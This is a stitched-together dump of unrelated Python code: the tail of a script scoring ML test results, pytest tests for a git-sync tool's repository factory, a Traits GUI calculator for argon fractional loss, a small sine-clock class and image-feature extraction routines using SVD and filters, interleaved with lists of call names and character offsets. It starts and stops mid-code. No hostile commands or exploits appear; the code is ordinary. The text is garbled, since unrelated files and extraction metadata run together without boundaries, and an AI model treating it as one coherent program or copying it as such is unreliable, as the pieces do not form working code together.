test_df = pd.concat([test_df, pd.read_csv(root + "/" + file, index_col=0)])
score = None
if args.exp_type == "class":
y_true = test_df.true.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
y_pred = test_df.pred.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
score = f1_score(y_pred=y_pred, y_true=y_true)
elif args.exp_type == "reg":
y_true = test_df.true.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
y_pred = test_df.pred.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
score = r2_score(y_pred=y_pred, y_true=y_true)
else:
raise Exception("not a valid output type")
test_list.append({"path": root, "score": score, "process": process})
print("finished reading. finding best result")
best_score = -9999999
best_idx = 0
for idx, test in tqdm(enumerate(test_list)):
if test["score"] > best_score:
best_score = test["score"]
best_idx = idx
best_test = test_list[best_idx]
print("best test results:\n score: {} \t process: {} \t path: {}".format(best_test["score"], best_test["process"],
best_test["path"]))
pd.DataFrame(test_list).sort_values(by="score", ascending=False).to_csv(
"/scratch/wdjo224/deep_protein_binding/"+args.exp_name+"_test_results.csv")
| [
"os.listdir",
"sklearn.metrics.f1_score",
"argparse.ArgumentParser",
"pandas.read_csv",
"pandas.DataFrame",
"sklearn.metrics.r2_score",
"os.walk"
] | [((144, 169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (167, 169), False, 'import argparse\n'), ((845, 866), 'os.walk', 'os.walk', (['args.exp_dir'], {}), '(args.exp_dir)\n', (852, 866), False, 'import os\n'), ((1078, 1139), 'pandas.DataFrame', 'pd.DataFrame', (["{'idx': [], 'pred': [], 'true': [], 'loss': []}"], {}), "({'idx': [], 'pred': [], 'true': [], 'loss': []})\n", (1090, 1139), True, 'import pandas as pd\n'), ((1160, 1176), 'os.listdir', 'os.listdir', (['root'], {}), '(root)\n', (1170, 1176), False, 'import os\n'), ((878, 902), 'os.listdir', 'os.listdir', (['args.exp_dir'], {}), '(args.exp_dir)\n', (888, 902), False, 'import os\n'), ((1583, 1621), 'sklearn.metrics.f1_score', 'f1_score', ([], {'y_pred': 'y_pred', 'y_true': 'y_true'}), '(y_pred=y_pred, y_true=y_true)\n', (1591, 1621), False, 'from sklearn.metrics import f1_score, r2_score\n'), ((1896, 1934), 'sklearn.metrics.r2_score', 'r2_score', ([], {'y_pred': 'y_pred', 'y_true': 'y_true'}), '(y_pred=y_pred, y_true=y_true)\n', (1904, 1934), False, 'from sklearn.metrics import f1_score, r2_score\n'), ((2545, 2568), 'pandas.DataFrame', 'pd.DataFrame', (['test_list'], {}), '(test_list)\n', (2557, 2568), True, 'import pandas as pd\n'), ((1220, 1263), 'pandas.read_csv', 'pd.read_csv', (["(root + '/' + file)"], {'index_col': '(0)'}), "(root + '/' + file, index_col=0)\n", (1231, 1263), True, 'import pandas as pd\n')] |
import os
from contextlib import ExitStack
from pathlib import Path
import pytest
from synctogit.git_factory import GitError, git_factory
def remotes_dump(remote_name, remote):
# fmt: off
return (
"%(remote_name)s\t%(remote)s (fetch)\n"
"%(remote_name)s\t%(remote)s (push)"
) % locals()
# fmt: on
def test_git_missing_dir(temp_dir):
d = str(Path(temp_dir) / "non-existing-dir")
with pytest.raises(GitError):
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote",
[
# fmt: off
("origin", None),
("angel", "<EMAIL>:KostyaEsmukov/SyncToGit.git"),
# fmt: on
],
)
def test_git_new_existing_empty_dir(call_git, temp_dir, remote_name, remote):
branch = "spooky"
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
git_factory(d, branch=branch, remote_name=remote_name, remote=remote)
git_root = call_git("git rev-parse --show-toplevel", cwd=d)
assert git_root == d
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == (
"HEAD -> spooky Update .gitignore (automated commit by synctogit)"
)
git_branch = call_git("git symbolic-ref --short HEAD", cwd=d)
assert git_branch == branch
git_branches = call_git(
"git for-each-ref --format='%(refname:short)' refs/heads/", cwd=d
)
assert git_branches == branch
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
def test_git_new_existing_dirty_dir(temp_dir):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
with pytest.raises(GitError): # Dirty dir
git_factory(d)
def test_git_load_existing_empty(call_git, temp_dir):
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
call_git("git init", cwd=d)
with pytest.raises(GitError): # No initial commit
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote, shadow_remote",
[
("origin", None, None),
("angel", "<EMAIL>:KostyaEsmukov/SyncToGit.git", None),
("angel", "<EMAIL>:new/remote.git", "git<EMAIL>:old/remote.git"),
("angel", "git<EMAIL>:same/remote.git", "git<EMAIL>:same/remote.git"),
],
)
def test_git_load_existing_not_empty(
call_git, temp_dir, remote_name, remote, shadow_remote
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
if shadow_remote:
call_git(f"git remote add {remote_name} {shadow_remote}", cwd=d)
with ExitStack() as stack:
if shadow_remote and remote != shadow_remote:
stack.enter_context(pytest.raises(GitError))
git = git_factory(d, remote_name=remote_name, remote=remote)
if shadow_remote and remote != shadow_remote:
return
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
with pytest.raises(GitError):
git_factory(d, branch="some-other-branch")
def test_git_nested(call_git, temp_dir):
root = Path(temp_dir) / "myroot"
inner = root / "myinner"
os.mkdir(str(root))
call_git("git init", cwd=str(root))
os.mkdir(str(inner))
git_factory(str(inner))
git_root = call_git("git rev-parse --show-toplevel", cwd=str(root))
assert git_root == str(root)
git_root = call_git("git rev-parse --show-toplevel", cwd=str(inner))
assert git_root == str(inner)
@pytest.mark.parametrize("is_up_to_date", [False, True])
def test_gitignore_existing(call_git, temp_dir, is_up_to_date):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if is_up_to_date:
gitignore_file.write_text(".synctogit*")
else:
gitignore_file.write_text("*.something")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
git = git_factory(d)
if is_up_to_date:
assert git.head.commit.summary == "The Cake is a lie"
else:
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
assert gitignore_file.read_text() == (
# fmt: off
"*.something\n"
".synctogit*\n"
# fmt: on
)
@pytest.mark.parametrize("dirty", ["repo", "gitignore"])
@pytest.mark.parametrize("is_dirty_staged", [False, True])
@pytest.mark.parametrize("is_new_file", [False, True])
def test_gitignore_update_with_dirty_repo(
call_git, temp_dir, dirty, is_dirty_staged, is_new_file
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if dirty == "gitignore":
dirty_file = gitignore_file
elif dirty == "repo":
dirty_file = p / ".lalalala"
call_git("git init", cwd=d)
if not is_new_file:
dirty_file.write_text("*.pdf")
call_git("git add .", cwd=d)
call_git('git commit --allow-empty -m "The Cake is a lie"', cwd=d)
dirty_file.write_text("*.something")
if is_dirty_staged:
call_git("git add .", cwd=d)
with ExitStack() as stack:
if dirty == "gitignore":
stack.enter_context(pytest.raises(GitError))
git = git_factory(d)
dirty_file.read_text() == "*.something"
if dirty == "gitignore":
# No commits should be created
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == ("HEAD -> master The Cake is a lie")
elif dirty == "repo":
# Dirty changes should be there and still not be committed.
gitignore_file.read_text() == ".synctogit*\n"
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
# Only .gitignore should be committed
git_show = call_git('git show --pretty="" --name-only', cwd=d)
assert git_show == ".gitignore"
# Ensure that the dirty files are in the same staged/unstaged state
git_status = call_git("git status --porcelain", cwd=d, space_trim=False)
if is_new_file:
prefix = "A " if is_dirty_staged else "?? "
else:
prefix = "M " if is_dirty_staged else " M "
assert git_status.startswith(prefix)
| [
"pathlib.Path",
"synctogit.git_factory.git_factory",
"pytest.mark.parametrize",
"pytest.raises",
"os.mkdir",
"contextlib.ExitStack"
] | [((480, 600), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""remote_name, remote"""', "[('origin', None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git')]"], {}), "('remote_name, remote', [('origin', None), ('angel',\n '<EMAIL>:KostyaEsmukov/SyncToGit.git')])\n", (503, 600), False, 'import pytest\n'), ((2068, 2362), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""remote_name, remote, shadow_remote"""', "[('origin', None, None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git',\n None), ('angel', '<EMAIL>:new/remote.git', 'git<EMAIL>:old/remote.git'),\n ('angel', 'git<EMAIL>:same/remote.git', 'git<EMAIL>:same/remote.git')]"], {}), "('remote_name, remote, shadow_remote', [('origin',\n None, None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git', None), (\n 'angel', '<EMAIL>:new/remote.git', 'git<EMAIL>:old/remote.git'), (\n 'angel', 'git<EMAIL>:same/remote.git', 'git<EMAIL>:same/remote.git')])\n", (2091, 2362), False, 'import pytest\n'), ((4003, 4058), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_up_to_date"""', '[False, True]'], {}), "('is_up_to_date', [False, True])\n", (4026, 4058), False, 'import pytest\n'), ((4951, 5006), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""dirty"""', "['repo', 'gitignore']"], {}), "('dirty', ['repo', 'gitignore'])\n", (4974, 5006), False, 'import pytest\n'), ((5008, 5065), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_dirty_staged"""', '[False, True]'], {}), "('is_dirty_staged', [False, True])\n", (5031, 5065), False, 'import pytest\n'), ((5067, 5120), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_new_file"""', '[False, True]'], {}), "('is_new_file', [False, True])\n", (5090, 5120), False, 'import pytest\n'), ((811, 822), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (819, 822), False, 'import os\n'), ((827, 896), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'branch': 'branch', 'remote_name': 'remote_name', 'remote': 'remote'}), '(d, branch=branch, remote_name=remote_name, remote=remote)\n', (838, 896), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1697, 1708), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (1705, 1708), False, 'import os\n'), ((1942, 1953), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (1950, 1953), False, 'import os\n'), ((2552, 2563), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (2560, 2563), False, 'import os\n'), ((4176, 4187), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (4184, 4187), False, 'import os\n'), ((4490, 4504), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (4501, 4504), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((5280, 5291), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (5288, 5291), False, 'import os\n'), ((429, 452), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (442, 452), False, 'import pytest\n'), ((462, 476), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (473, 476), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1652, 1666), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (1656, 1666), False, 'from pathlib import Path\n'), ((1782, 1805), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (1795, 1805), False, 'import pytest\n'), ((1828, 1842), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (1839, 1842), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1996, 2019), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (2009, 2019), False, 'import pytest\n'), ((2050, 2064), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (2061, 2064), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((2507, 2521), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (2511, 2521), False, 'from pathlib import Path\n'), ((2855, 2866), 'contextlib.ExitStack', 'ExitStack', ([], {}), '()\n', (2864, 2866), False, 'from contextlib import ExitStack\n'), ((3002, 3056), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'remote_name': 'remote_name', 'remote': 'remote'}), '(d, remote_name=remote_name, remote=remote)\n', (3013, 3056), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((3483, 3506), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (3496, 3506), False, 'import pytest\n'), ((3516, 3558), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'branch': '"""some-other-branch"""'}), "(d, branch='some-other-branch')\n", (3527, 3558), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((3613, 3627), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (3617, 3627), False, 'from pathlib import Path\n'), ((4131, 4145), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (4135, 4145), False, 'from pathlib import Path\n'), ((5235, 5249), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (5239, 5249), False, 'from pathlib import Path\n'), ((5779, 5790), 'contextlib.ExitStack', 'ExitStack', ([], {}), '()\n', (5788, 5790), False, 'from contextlib import ExitStack\n'), ((5905, 5919), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (5916, 5919), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((383, 397), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (387, 397), False, 'from pathlib import Path\n'), ((780, 794), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (784, 794), False, 'from pathlib import Path\n'), ((1911, 1925), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (1915, 1925), False, 'from pathlib import Path\n'), ((2963, 2986), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (2976, 2986), False, 'import pytest\n'), ((5866, 5889), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (5879, 5889), False, 'import pytest\n')] |
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from numpy import linspace
from traits.api import HasTraits, Int, Float, Instance, on_trait_change
from traitsui.api import View, VGroup, UItem, Item, HGroup
from pychron.graph.graph import Graph
from pychron.processing.argon_calculations import calculate_fractional_loss
class FractionalLossCalculator(HasTraits):
graph = Instance(Graph)
temp = Float(475)
min_age = Int(1)
max_age = Int(1000)
radius = Float(0.1)
def __init__(self, *args, **kw):
super(FractionalLossCalculator, self).__init__(*args, **kw)
self.graph = g = Graph()
g.new_plot()
xs, ys = self._calculate_data()
g.new_series(xs, ys)
def _calculate_data(self):
xs = linspace(self.min_age, self.max_age)
fs = [calculate_fractional_loss(ti, self.temp, self.radius) for ti in xs]
return xs, fs
@on_trait_change("temp, radius, max_age, min_age")
def _replot(self):
xs, ys = self._calculate_data()
self.graph.set_data(xs)
self.graph.set_data(ys, axis=1)
def traits_view(self):
a = HGroup(Item("temp"), Item("radius"), Item("min_age"), Item("max_age"))
v = View(VGroup(a, UItem("graph", style="custom")))
return v
if __name__ == "__main__":
f = FractionalLossCalculator()
f.configure_traits()
# ============= EOF =============================================
| [
"traits.api.Instance",
"traits.api.on_trait_change",
"pychron.graph.graph.Graph",
"traitsui.api.Item",
"numpy.linspace",
"traits.api.Int",
"traitsui.api.UItem",
"pychron.processing.argon_calculations.calculate_fractional_loss",
"traits.api.Float"
] | [((1058, 1073), 'traits.api.Instance', 'Instance', (['Graph'], {}), '(Graph)\n', (1066, 1073), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1085, 1095), 'traits.api.Float', 'Float', (['(475)'], {}), '(475)\n', (1090, 1095), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1110, 1116), 'traits.api.Int', 'Int', (['(1)'], {}), '(1)\n', (1113, 1116), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1131, 1140), 'traits.api.Int', 'Int', (['(1000)'], {}), '(1000)\n', (1134, 1140), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1154, 1164), 'traits.api.Float', 'Float', (['(0.1)'], {}), '(0.1)\n', (1159, 1164), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1588, 1637), 'traits.api.on_trait_change', 'on_trait_change', (['"""temp, radius, max_age, min_age"""'], {}), "('temp, radius, max_age, min_age')\n", (1603, 1637), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1297, 1304), 'pychron.graph.graph.Graph', 'Graph', ([], {}), '()\n', (1302, 1304), False, 'from pychron.graph.graph import Graph\n'), ((1441, 1477), 'numpy.linspace', 'linspace', (['self.min_age', 'self.max_age'], {}), '(self.min_age, self.max_age)\n', (1449, 1477), False, 'from numpy import linspace\n'), ((1492, 1545), 'pychron.processing.argon_calculations.calculate_fractional_loss', 'calculate_fractional_loss', (['ti', 'self.temp', 'self.radius'], {}), '(ti, self.temp, self.radius)\n', (1517, 1545), False, 'from pychron.processing.argon_calculations import calculate_fractional_loss\n'), ((1821, 1833), 'traitsui.api.Item', 'Item', (['"""temp"""'], {}), "('temp')\n", (1825, 1833), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1835, 1849), 'traitsui.api.Item', 'Item', (['"""radius"""'], {}), "('radius')\n", (1839, 1849), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1851, 1866), 'traitsui.api.Item', 'Item', (['"""min_age"""'], {}), "('min_age')\n", (1855, 1866), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1868, 1883), 'traitsui.api.Item', 'Item', (['"""max_age"""'], {}), "('max_age')\n", (1872, 1883), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1912, 1942), 'traitsui.api.UItem', 'UItem', (['"""graph"""'], {'style': '"""custom"""'}), "('graph', style='custom')\n", (1917, 1942), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n')] |
import math
from inputs.sine import Sine
from inputs.timeElapsed import TimeElapsed
from utils.number import Number
class SineClock(Number):
def __init__(self, sine: Sine):
self.__sine = sine
self.__elapsed = TimeElapsed()
def get(self):
return self.__sine.at_time(self.__elapsed.get())
| [
"inputs.timeElapsed.TimeElapsed"
] | [((232, 245), 'inputs.timeElapsed.TimeElapsed', 'TimeElapsed', ([], {}), '()\n', (243, 245), False, 'from inputs.timeElapsed import TimeElapsed\n')] |
# main imports
import numpy as np
import sys
# image transform imports
from PIL import Image
from skimage import color
from sklearn.decomposition import FastICA
from sklearn.decomposition import IncrementalPCA
from sklearn.decomposition import TruncatedSVD
from numpy.linalg import svd as lin_svd
from scipy.signal import medfilt2d, wiener, cwt
import pywt
import cv2
from ipfml.processing import transform, compression, segmentation
from ipfml.filters import convolution, kernels
from ipfml import utils
# modules and config imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
def get_image_features(data_type, block):
"""
Method which returns the data type expected
"""
if data_type == 'lab':
block_file_path = '/tmp/lab_img.png'
block.save(block_file_path)
data = transform.get_LAB_L_SVD_s(Image.open(block_file_path))
if data_type == 'mscn':
img_mscn_revisited = transform.rgb_to_mscn(block)
# save tmp as img
img_output = Image.fromarray(img_mscn_revisited.astype('uint8'), 'L')
mscn_revisited_file_path = '/tmp/mscn_revisited_img.png'
img_output.save(mscn_revisited_file_path)
img_block = Image.open(mscn_revisited_file_path)
# extract from temp image
data = compression.get_SVD_s(img_block)
"""if data_type == 'mscn':
img_gray = np.array(color.rgb2gray(np.asarray(block))*255, 'uint8')
img_mscn = transform.calculate_mscn_coefficients(img_gray, 7)
img_mscn_norm = transform.normalize_2D_arr(img_mscn)
img_mscn_gray = np.array(img_mscn_norm*255, 'uint8')
data = compression.get_SVD_s(img_mscn_gray)
"""
if data_type == 'low_bits_6':
low_bits_6 = transform.rgb_to_LAB_L_low_bits(block, 6)
data = compression.get_SVD_s(low_bits_6)
if data_type == 'low_bits_5':
low_bits_5 = transform.rgb_to_LAB_L_low_bits(block, 5)
data = compression.get_SVD_s(low_bits_5)
if data_type == 'low_bits_4':
low_bits_4 = transform.rgb_to_LAB_L_low_bits(block, 4)
data = compression.get_SVD_s(low_bits_4)
if data_type == 'low_bits_3':
low_bits_3 = transform.rgb_to_LAB_L_low_bits(block, 3)
data = compression.get_SVD_s(low_bits_3)
if data_type == 'low_bits_2':
low_bits_2 = transform.rgb_to_LAB_L_low_bits(block, 2)
data = compression.get_SVD_s(low_bits_2)
if data_type == 'low_bits_4_shifted_2':
data = compression.get_SVD_s(transform.rgb_to_LAB_L_bits(block, (3, 6)))
if data_type == 'sub_blocks_stats':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=100)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_stats_reduced':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area_normed':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
l_svd_data = utils.normalize_arr(l_svd_data)
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'mscn_var_4':
data = _get_mscn_variance(block, (100, 100))
if data_type == 'mscn_var_16':
data = _get_mscn_variance(block, (50, 50))
if data_type == 'mscn_var_64':
data = _get_mscn_variance(block, (25, 25))
if data_type == 'mscn_var_16_max':
data = _get_mscn_variance(block, (50, 50))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'mscn_var_64_max':
data = _get_mscn_variance(block, (25, 25))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'ica_diff':
current_image = transform.get_LAB_L(block)
ica = FastICA(n_components=50)
ica.fit(current_image)
image_ica = ica.fit_transform(current_image)
image_restored = ica.inverse_transform(image_ica)
final_image = utils.normalize_2D_arr(image_restored)
final_image = np.array(final_image * 255, 'uint8')
sv_values = utils.normalize_arr(compression.get_SVD_s(current_image))
ica_sv_values = utils.normalize_arr(compression.get_SVD_s(final_image))
data = abs(np.array(sv_values) - np.array(ica_sv_values))
if data_type == 'svd_trunc_diff':
current_image = transform.get_LAB_L(block)
svd = TruncatedSVD(n_components=30, n_iter=100, random_state=42)
transformed_image = svd.fit_transform(current_image)
restored_image = svd.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'ipca_diff':
current_image = transform.get_LAB_L(block)
transformer = IncrementalPCA(n_components=20, batch_size=25)
transformed_image = transformer.fit_transform(current_image)
restored_image = transformer.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'svd_reconstruct':
reconstructed_interval = (90, 200)
begin, end = reconstructed_interval
lab_img = transform.get_LAB_L(block)
lab_img = np.array(lab_img, 'uint8')
U, s, V = lin_svd(lab_img, full_matrices=True)
smat = np.zeros((end-begin, end-begin), dtype=complex)
smat[:, :] = np.diag(s[begin:end])
output_img = np.dot(U[:, begin:end], np.dot(smat, V[begin:end, :]))
output_img = np.array(output_img, 'uint8')
data = compression.get_SVD_s(output_img)
if 'sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'wave_sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'sv_std_filters_full' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
